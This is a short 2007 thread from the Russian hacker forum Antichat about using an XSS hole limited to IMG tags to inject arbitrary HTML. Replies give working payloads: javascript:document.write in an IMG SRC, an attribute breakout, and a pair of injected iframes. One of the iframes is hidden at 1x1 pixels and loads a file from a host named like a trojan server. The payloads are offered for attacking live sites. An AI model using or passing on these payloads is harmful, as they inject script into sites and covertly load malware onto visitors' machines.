Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Iframe через XSS ... (https://forum.antichat.xyz/showthread.php?t=49442)

+StArT+ 20.09.2007 16:49

Iframe через XSS ...
 
Возможно ли при наличии ХSS вида:
Код:

<IMG SRC="javascript:alert('XSS');">
выполнить html код, например <iframe>?

P.S Разрешенные теги только <img> =\
...

Dr.Z3r0 20.09.2007 16:56

Возможно:
Код:

<IMG SRC="javascript:document.write('[html код]');">
ЗЫ все гениальное просто :)

+StArT+ 20.09.2007 17:52

Спасибо оч помог, но вот еще есть одна проблема,
при выполнении происходит редирект на пустую страницу, возможно ли этого как то избежать?

Ponchik 20.09.2007 23:24

Это не редирект, это жаваскрипт всё стирает и создаёт вместо этого фреймы, была такаяже трабла, на форуме постали в мануал и в общем не избежать этого :)

NOmeR1 20.09.2007 23:46

А вы не думали поставить ифрейм на страницу с XSS и на страницу которую надо проифреймить

Например
javascript:document.write('<iframe width=100% height=100% src="http://forum.antichat.ru/"></iframe><iframe width=1 height=1 src="http://vasyaHacker.rulez.troyan.co.ua/file.php"></iframe>');

И вообще, если ничего не фильтруется, попробуй обойти тег, то есть:
<IMG SRC=""><iframe.........>">

Почитай статьи о XSS и всё поймёшь %)


Время: 05:37